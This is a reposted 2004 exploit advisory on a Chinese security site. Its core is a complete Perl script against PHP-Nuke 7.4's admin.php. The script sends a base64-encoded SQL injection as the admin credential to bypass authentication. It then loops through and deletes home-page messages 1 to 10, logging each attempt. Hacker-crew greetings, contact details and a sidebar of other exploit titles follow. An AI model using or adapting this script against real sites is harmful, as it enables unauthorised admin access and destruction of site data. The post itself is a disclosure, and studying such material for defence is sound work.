首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP-Nuke 7.4 SQL Injection Exploit
来源:www.geocities.com 作者:iko94 发布时间:2004-09-11  

PHP-Nuke 7.4 SQL Injection Exploit

[XSS]/SQL Injection PHP-Nuke Delete Message(s) Bug by bima_

Php-Nuke is a popular freeware content management system.
Based on information at :
http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+PHP-Nuke+7.4+Add+Message+Bug

An attacker permitted to post to global home-page messages.

I found that we can delete message(s) too.

I wrote a little perl script to prove it, i used POST method.

Here it is :

******cut here**************
#!/usr/bin/perl
#

use LWP;

$log = "pos_phpnuke_deletemsg.txt";
$Agent = "Mbahmu/1.0";
$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

for ($a = 1; $a < 11; $a++) {

$mid=$a;

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend =
'mid='.$mid.
'&ok=1'.
'&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'.
'&add_radminsuper=1'.
'&op=deletemsg';
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#print ($logincek);


if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){
printlog ("$mid attempting delete message sending OK ".$loginresponse->status_line ."\n");
}
else {
printlog ("$mid could be failure ".$loginresponse->status_line ."\n");
last;
}

} #end of for

sub printlog {
print @_[0];
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}
******cut here**************

----------------------------------------------------------

*very very very special greetz to:
[+][+][+] my beloved anna [+][+][+]

*shout to dhanny firman syah : keep fighting, bro...

*special greetz to:
[+] www.neoteker.or.id
[+] www.echo.or.id
[+] www.bosen.net
[+] qq
[+] tiyox
[+] bosen
[+] ftp_geo
[+] tiong
[+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net
[+] all #1stlink #romance #hackers @ centrin
[+] sj, alphacentupret, boeboe, fuzk3 kendi
[+] y3d1ps, z3r0byt3, biatch-x, K-159

*contact:
[+] iko94@yahoo.com
[+] www.geocities.com/iko94
[+] www.neoteker.or.id

[EOF]



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Citadel/UX <= 6.23 Remote U
·Trillian 0.74i Remote Buffer O
·cdrdao local root exploit
·Citadel/UX<= 6.23 Remote US
·TorrentTrader 1.0 RC2 SQL Inje
·Cdrecord Local Root Exploit
·Courier-IMAP <= 3.0.2-r1 au
·BlackJumboDog FTP Server Buffe
·AOL Instant Messenger AIM "Awa
·Cdrecord Local Exploit (SUID S
·注射MSSQL时解决的一个未有人提
·finding hidden modules on 2.6
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved